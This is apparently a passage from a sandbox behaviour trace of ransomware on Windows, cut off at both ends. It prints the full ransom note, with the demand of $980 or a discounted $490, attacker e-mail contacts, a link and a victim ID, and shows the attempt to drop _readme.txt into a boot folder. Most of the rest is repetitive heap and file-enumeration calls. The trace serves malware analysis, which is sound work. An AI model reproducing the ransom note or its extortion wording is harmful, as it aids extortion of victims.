e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.728] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.728] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.729] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 [0209.729] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87060 | out: hHeap=0x750000) returned 1 [0209.729] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.729] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.729] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.729] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.729] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.729] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.729] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.729] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.730] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.730] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.730] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.730] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.730] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.730] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.730] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.730] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.730] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.730] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.730] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.730] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.730] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.730] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.730] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.730] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.730] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.730] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.730] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.730] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.730] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.730] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.731] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.731] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.731] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.731] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.731] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.731] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.731] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.731] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.731] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.731] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.731] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.731] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.731] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.731] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.731] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.731] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.731] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.731] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.731] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.731] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.731] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.731] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.731] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.731] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.731] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.732] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.732] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.732] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.732] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.732] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.732] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.732] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.732] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.732] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.732] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.732] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.732] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.732] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.732] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.732] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.732] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.732] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.732] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.732] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.732] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.732] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.732] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.732] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.732] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.732] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.733] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.733] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.733] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.733] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.733] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.733] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.733] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.733] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.733] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.733] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.733] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.733] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.733] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.733] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.733] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.733] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.733] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.733] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.733] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.733] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.733] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.733] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.733] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.733] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.734] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.734] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.734] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.734] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.734] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.734] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.734] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.734] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.734] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.734] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.734] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.734] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.734] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.734] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.734] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.734] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.734] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.734] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.734] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.734] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.734] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.734] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.734] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.735] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.735] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.735] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.735] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.735] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.735] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.735] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.735] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.735] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.735] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.735] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.735] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.735] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.735] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.735] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.735] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.735] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.735] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.735] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.735] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.735] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.735] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.735] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.735] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.736] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.736] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.736] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.736] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.736] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.736] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.736] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.736] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.736] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.736] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.736] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.736] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.736] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.736] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.736] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.736] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.736] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.736] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.736] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.736] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.736] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.736] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.736] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.736] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.736] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.736] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.737] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.737] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.737] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.737] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.737] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.737] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.737] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.737] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.737] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.737] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.737] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.737] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.737] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.737] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.737] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.737] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.737] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.737] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.737] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.737] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.737] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.737] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.737] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.738] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.738] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.738] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.738] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.738] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.738] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.738] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.738] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.738] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.738] RtlAllocateHeap 